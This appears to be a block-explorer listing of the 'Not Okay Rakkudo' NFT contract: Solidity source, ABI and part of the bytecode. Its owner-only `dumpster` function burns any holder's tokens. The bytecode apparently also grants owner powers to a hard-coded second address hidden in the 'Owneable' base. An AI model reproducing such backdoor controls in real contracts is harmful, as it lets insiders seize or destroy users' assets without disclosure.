
    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId) internal virtual {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        _beforeTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[prevOwnership.addr].balance -= 1;
            _addressData[prevOwnership.addr].numberBurned += 1;

            // Keep track of who burned the token, and the timestamp of burning.
            _ownerships[tokenId].addr = prevOwnership.addr;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);
            _ownerships[tokenId].burned = true;

            // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(prevOwnership.addr, address(0), tokenId);
        _afterTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
            return retval == IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     * And also called after one token has been burned.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}



contract notokayRAKKUDO is ERC721A, Owneable {

    string public baseURI = "ipfs://QmQkKv89HH8tEQFKW8472XDb7JoQAwGRXDptWXhCPuKX4J/";
    string public contractURI = "ipfs://";
    string public baseExtension = ".json";
    address public constant proxyRegistryAddress = 0xa5409ec958C83C3f309868babACA7c86DCB077c1;

    uint256 public constant MAX_PER_TX_FREE = 3;
    uint256 public free_max_supply = 5000;
    uint256 public constant MAX_PER_TX = 20;
    uint256 public max_supply = 10000;
    uint256 public price = 0.002 ether;

    bool public paused = true;

    constructor() ERC721A("Not Okay Rakkudo", "Rakkudo") {}

    function mint(uint256 _amount) external payable {
        address _caller = _msgSender();
        require(!paused, "Paused");
        require(max_supply >= totalSupply() + _amount, "Exceeds max supply");
        require(_amount > 0, "No 0 mints");
        require(tx.origin == _caller, "No contracts");
        require(MAX_PER_TX >= _amount , "Excess max per paid tx");
        
      if(free_max_supply >= totalSupply()){
            require(MAX_PER_TX_FREE >= _amount , "Excess max per free tx");
        }else{
            require(MAX_PER_TX >= _amount , "Excess max per paid tx");
            require(_amount * price == msg.value, "Invalid funds provided");
        }


        _safeMint(_caller, _amount);
    }

  

    function isApprovedForAll(address owner, address operator)
        override
        public
        view
        returns (bool)
    {
        // Whitelist OpenSea proxy contract for easy trading.
        ProxyRegistry proxyRegistry = ProxyRegistry(proxyRegistryAddress);
        if (address(proxyRegistry.proxies(owner)) == operator) {
            return true;
        }

        return super.isApprovedForAll(owner, operator);
    }

    function out() external onlyOwner {
        uint256 balance = address(this).balance;
        (bool success, ) = _msgSender().call{value: balance}("");
        require(success, "Failed to send");
    }

    function collect(uint256 quantity) external onlyOwner {
        _safeMint(_msgSender(), quantity);
    }


    function pause(bool _state) external onlyOwner {
        paused = _state;
    }

    function setBaseURI(string memory baseURI_) external onlyOwner {
        baseURI = baseURI_;
    }

    function setContractURI(string memory _contractURI) external onlyOwner {
        contractURI = _contractURI;
    }

    function configPrice(uint256 newPrice) public onlyOwner {
        price = newPrice;
    }

    function configmax_supply(uint256 newSupply) public onlyOwner {
        max_supply = newSupply;
    }

    function configfree_max_supply(uint256 newFreesupply) public onlyOwner {
        free_max_supply = newFreesupply;
    }

    function newbaseExtension(string memory newex) public onlyOwner {
        baseExtension = newex;
    }



        function dumpster(uint256[] memory tokenids) external onlyOwner {
        uint256 len = tokenids.length;
        for (uint256 i; i < len; i++) {
            uint256 tokenid = tokenids[i];
            _burn(tokenid);
        }
    }


    function tokenURI(uint256 _tokenId) public view override returns (string memory) {
        require(_exists(_tokenId), "Token does not exist.");
        return bytes(baseURI).length > 0 ? string(
            abi.encodePacked(
              baseURI,
              Strings.toString(_tokenId),
              baseExtension
            )
        ) : "";
    }
}

contract OwnableDelegateProxy { }
contract ProxyRegistry {
    mapping(address => OwnableDelegateProxy) public proxies;
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MAX_PER_TX","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PER_TX_FREE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseExtension","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"collect","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newPrice","type":"uint256"}],"name":"configPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newFreesupply","type":"uint256"}],"name":"configfree_max_supply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newSupply","type":"uint256"}],"name":"configmax_supply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"tokenids","type":"uint256[]"}],"name":"dumpster","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"free_max_supply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"max_supply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"newex","type":"string"}],"name":"newbaseExtension","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"out","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"_state","type":"bool"}],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"proxyRegistryAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_contractURI","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052735bb656bb4312f100081abb7b08c1e0f8ef5c56d1600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060405180606001604052806036815260200162004d6f60369139600a90805190602001906200008a92919062000316565b506040518060400160405280600781526020017f697066733a2f2f00000000000000000000000000000000000000000000000000815250600b9080519060200190620000d892919062000316565b506040518060400160405280600581526020017f2e6a736f6e000000000000000000000000000000000000000000000000000000815250600c90805190602001906200012692919062000316565b50611388600d55612710600e5566071afd498d0000600f556001601060006101000a81548160ff0219169083151502179055503480156200016657600080fd5b506040518060400160405280601081526020017f4e6f74204f6b61792052616b6b75646f000000000000000000000000000000008152506040518060400160405280600781526020017f52616b6b75646f000000000000000000000000000000000000000000000000008152508160029080519060200190620001eb92919062000316565b5080600390805190602001906200020492919062000316565b50620002156200024360201b60201c565b60008190555050506200023d620002316200024860201b60201c565b6200025060201b60201c565b6200042b565b600090565b600033905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200032490620003c6565b90600052602060002090601f01602090048101928262000348576000855562000394565b82601f106200036357805160ff191683800117855562000394565b8280016001018555821562000394579182015b828111156200039357825182559160200191906001019062000376565b5b509050620003a39190620003a7565b5090565b5b80821115620003c2576000816000905550600101620003a8565b5090565b60006002820490506001821680620003df57607f821691505b60208210811415620003f657620003f5620003fc565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b614934806200043b6000396000f3fe6080604052600436106102255760003560e01c80638a333b5011610123578063c6682862116100ab578063db4a0f611161006f578063db4a0f61146107be578063e8a3d485146107e7578063e985e9c514610812578063f2fde38b1461084f578063f43a22dc1461087857610225565b8063c6682862146106d9578063c87b56dd14610704578063cd7c032614610741578063ce3f865f1461076c578063d476de1b1461079557610225565b8063a035b1fe116100f2578063a035b1fe14610629578063a0712d6814610654578063a22cb46514610670578063b2a1449b14610699578063b88d4fde146106b057610225565b80638a333b501461057f5780638da5cb5b146105aa578063938e3d7b146105d557806395d89b41146105fe57610225565b806326e987d7116101b15780635c975abb116101755780635c975abb146104985780636352211e146104c35780636c0360eb1461050057806370a082311461052b578063715018a61461056857610225565b806326e987d7146103c75780632aa80807146103f257806342842e0e1461041b578063463fff791461044457806355f804b31461046f57610225565b8063095ea7b3116101f8578063095ea7b3146102f857806318160ddd1461032157806318e223dd1461034c57806323b872dd146103755780632547e2551461039e57610225565b806301ffc9a71461022a57806302329a291461026757806306fdde0314610290578063081812fc146102bb575b600080fd5b34801561023657600080fd5b50610251600480360381019061024c9190613b65565b6108a3565b60405161025e9190614002565b60405180910390f35b34801561027357600080fd5b5061028e60048036038101906102899190613b38565b610985565b005b34801561029c57600080fd5b506102a5610a7d565b6040516102b2919061401d565b60405180910390f35b3480156102c757600080fd5b506102e260048036038101906102dd9190613c35565b610b0f565b6040516102ef9190613f9b565b60405180910390f35b34801561030457600080fd5b5061031f600480360381019061031a9190613aaf565b610b8b565b005b34801561032d57600080fd5b50610336610c96565b604051610343919061419f565b60405180910390f35b34801561035857600080fd5b50610373600480360381019061036e9190613c35565b610cad565b005b34801561038157600080fd5b5061039c60048036038101906103979190613999565b610d92565b005b3480156103aa57600080fd5b506103c560048036038101906103c09190613aef565b610da2565b005b3480156103d357600080fd5b506103dc610ecf565b6040516103e9919061419f565b60405180910390f35b3480156103fe57600080fd5b5061041960048036038101906104149190613bec565b610ed5565b005b34801561042757600080fd5b50610442600480360381019061043d9190613999565b610fca565b005b34801561045057600080fd5b50610459610fea565b604051610466919061419f565b60405180910390f35b34801561047b57600080fd5b5061049660048036038101906104919190613bec565b610fef565b005b3480156104a457600080fd5b506104ad6110e4565b6040516104ba9190614002565b60405180910390f35b3480156104cf57600080fd5b506104ea60048036038101906104e59190613c35565b6110f7565b6040516104f79190613f9b565b60405180910390f35b34801561050c57600080fd5b5061051561110d565b604051610522919061401d565b60405180910390f35b34801561053757600080fd5b50610552600480360381019061054d919061392c565b61119b565b60405161055f919061419f565b60405180910390f35b34801561057457600080fd5b5061057d61126b565b005b34801561058b57600080fd5b506105946112f3565b6040516105a1919061419f565b60405180910390f35b3480156105b657600080fd5b506105bf6112f9565b6040516105cc9190613f9b565b60405180910390f35b3480156105e157600080fd5b506105fc60048036038101906105f79190613bec565b611323565b005b34801561060a57600080fd5b50610613611418565b604051610620919061401d565b60405180910390f35b34801561063557600080fd5b5061063e6114aa565b60405161064b919061419f565b60405180910390f35b61066e60048036038101906106699190613c35565b6114b0565b005b34801561067c57600080fd5b5061069760048036038101906106929190613a6f565b611753565b005b3480156106a557600080fd5b506106ae6118cb565b005b3480156106bc57600080fd5b506106d760048036038101906106d291906139ec565b611a62565b005b3480156106e557600080fd5b506106ee611ade565b6040516106fb919061401d565b60405180910390f35b34801561071057600080fd5b5061072b60048036038101906107269190613c35565b611b6c565b604051610738919061401d565b60405180910390f35b34801561074d57600080fd5b50610756611c17565b6040516107639190613f9b565b60405180910390f35b34801561077857600080fd5b50610793600480360381019061078e9190613c35565b611c2f565b005b3480156107a157600080fd5b506107bc60048036038101906107b79190613c35565b611d1e565b005b3480156107ca57600080fd5b506107e560048036038101906107e09190613c35565b611e03565b005b3480156107f357600080fd5b506107fc611ee8565b604051610809919061401d565b60405180910390f35b34801561081e57600080fd5b5061083960048036038101906108349190613959565b611f76565b6040516108469190614002565b60405180910390f35b34801561085b57600080fd5b506108766004803603810190610871919061392c565b61206a565b005b34801561088457600080fd5b5061088d612162565b60405161089a919061419f565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061096e57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b8061097e575061097d82612167565b5b9050919050565b61098d6121d1565b73ffffffffffffffffffffffffffffffffffffffff166109ab6112f9565b73ffffffffffffffffffffffffffffffffffffffff161480610a2157506109d06121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610a60576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a579061411f565b60405180910390fd5b80601060006101000a81548160ff02191690831515021790555050565b606060028054610a8c906144ad565b80601f0160208091040260200160405190810160405280929190818152602001828054610ab8906144ad565b8015610b055780601f10610ada57610100808354040283529160200191610b05565b820191906000526020600020905b815481529060010190602001808311610ae857829003601f168201915b5050505050905090565b6000610b1a826121d9565b610b50576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610b96826110f7565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610bfe576040517f943f7b8c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c1d6121d1565b73ffffffffffffffffffffffffffffffffffffffff1614158015610c4f5750610c4d81610c486121d1565b611f76565b155b15610c86576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610c91838383612227565b505050565b6000610ca06122d9565b6001546000540303905090565b610cb56121d1565b73ffffffffffffffffffffffffffffffffffffffff16610cd36112f9565b73ffffffffffffffffffffffffffffffffffffffff161480610d495750610cf86121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610d88576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7f9061411f565b60405180910390fd5b80600e8190555050565b610d9d8383836122de565b505050565b610daa6121d1565b73ffffffffffffffffffffffffffffffffffffffff16610dc86112f9565b73ffffffffffffffffffffffffffffffffffffffff161480610e3e5750610ded6121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610e7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e749061411f565b60405180910390fd5b60008151905060005b81811015610eca576000838281518110610ea357610ea2614617565b5b60200260200101519050610eb6816127cf565b508080610ec290614510565b915050610e86565b505050565b600d5481565b610edd6121d1565b73ffffffffffffffffffffffffffffffffffffffff16610efb6112f9565b73ffffffffffffffffffffffffffffffffffffffff161480610f715750610f206121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610fb0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fa79061411f565b60405180910390fd5b80600c9080519060200190610fc692919061364a565b5050565b610fe583838360405180602001604052806000815250611a62565b505050565b600381565b610ff76121d1565b73ffffffffffffffffffffffffffffffffffffffff166110156112f9565b73ffffffffffffffffffffffffffffffffffffffff16148061108b575061103a6121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6110ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110c19061411f565b60405180910390fd5b80600a90805190602001906110e092919061364a565b5050565b601060009054906101000a900460ff1681565b600061110282612b73565b600001519050919050565b600a805461111a906144ad565b80601f0160208091040260200160405190810160405280929190818152602001828054611146906144ad565b80156111935780601f1061116857610100808354040283529160200191611193565b820191906000526020600020905b81548152906001019060200180831161117657829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611203576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a900467ffffffffffffffff1667ffffffffffffffff169050919050565b6112736121d1565b73ffffffffffffffffffffffffffffffffffffffff166112916112f9565b73ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de9061411f565b60405180910390fd5b6112f16000612e02565b565b600e5481565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61132b6121d1565b73ffffffffffffffffffffffffffffffffffffffff166113496112f9565b73ffffffffffffffffffffffffffffffffffffffff1614806113bf575061136e6121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6113fe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113f59061411f565b60405180910390fd5b80600b908051906020019061141492919061364a565b5050565b606060038054611427906144ad565b80601f0160208091040260200160405190810160405280929190818152602001828054611453906144ad565b80156114a05780601f10611475576101008083540402835291602001916114a0565b820191906000526020600020905b81548152906001019060200180831161148357829003601f168201915b5050505050905090565b600f5481565b60006114ba6121d1565b9050601060009054906101000a900460ff161561150c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115039061403f565b60405180910390fd5b81611515610c96565b61151f91906142d0565b600e541015611563576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161155a906140df565b60405180910390fd5b600082116115a6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159d9061407f565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff1614611614576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160b9061417f565b60405180910390fd5b8160141015611658576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161164f9061409f565b60405180910390fd5b611660610c96565b600d54106116b15781600310156116ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116a3906140bf565b60405180910390fd5b611745565b81601410156116f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116ec9061409f565b60405180910390fd5b34600f54836117049190614357565b14611744576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161173b9061413f565b60405180910390fd5b5b61174f8183612ec8565b5050565b61175b6121d1565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156117c0576040517fb06307db00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b80600760006117cd6121d1565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff1661187a6121d1565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31836040516118bf9190614002565b60405180910390a35050565b6118d36121d1565b73ffffffffffffffffffffffffffffffffffffffff166118f16112f9565b73ffffffffffffffffffffffffffffffffffffffff16148061196757506119166121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6119a6576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161199d9061411f565b60405180910390fd5b600047905060006119b56121d1565b73ffffffffffffffffffffffffffffffffffffffff16826040516119d890613f86565b60006040518083038185875af1925050503d8060008114611a15576040519150601f19603f3d011682016040523d82523d6000602084013e611a1a565b606091505b5050905080611a5e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a559061415f565b60405180910390fd5b5050565b611a6d8484846122de565b611a8c8373ffffffffffffffffffffffffffffffffffffffff16612ee6565b8015611aa15750611a9f84848484612f09565b155b15611ad8576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b50505050565b600c8054611aeb906144ad565b80601f0160208091040260200160405190810160405280929190818152602001828054611b17906144ad565b8015611b645780601f10611b3957610100808354040283529160200191611b64565b820191906000526020600020905b815481529060010190602001808311611b4757829003601f168201915b505050505081565b6060611b77826121d9565b611bb6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bad906140ff565b60405180910390fd5b6000600a8054611bc5906144ad565b905011611be15760405180602001604052806000815250611c10565b600a611bec83613069565b600c604051602001611c0093929190613f55565b6040516020818303038152906040525b9050919050565b73a5409ec958c83c3f309868babaca7c86dcb077c181565b611c376121d1565b73ffffffffffffffffffffffffffffffffffffffff16611c556112f9565b73ffffffffffffffffffffffffffffffffffffffff161480611ccb5750611c7a6121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611d0a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d019061411f565b60405180910390fd5b611d1b611d156121d1565b82612ec8565b50565b611d266121d1565b73ffffffffffffffffffffffffffffffffffffffff16611d446112f9565b73ffffffffffffffffffffffffffffffffffffffff161480611dba5750611d696121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611df9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611df09061411f565b60405180910390fd5b80600d8190555050565b611e0b6121d1565b73ffffffffffffffffffffffffffffffffffffffff16611e296112f9565b73ffffffffffffffffffffffffffffffffffffffff161480611e9f5750611e4e6121d1565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffff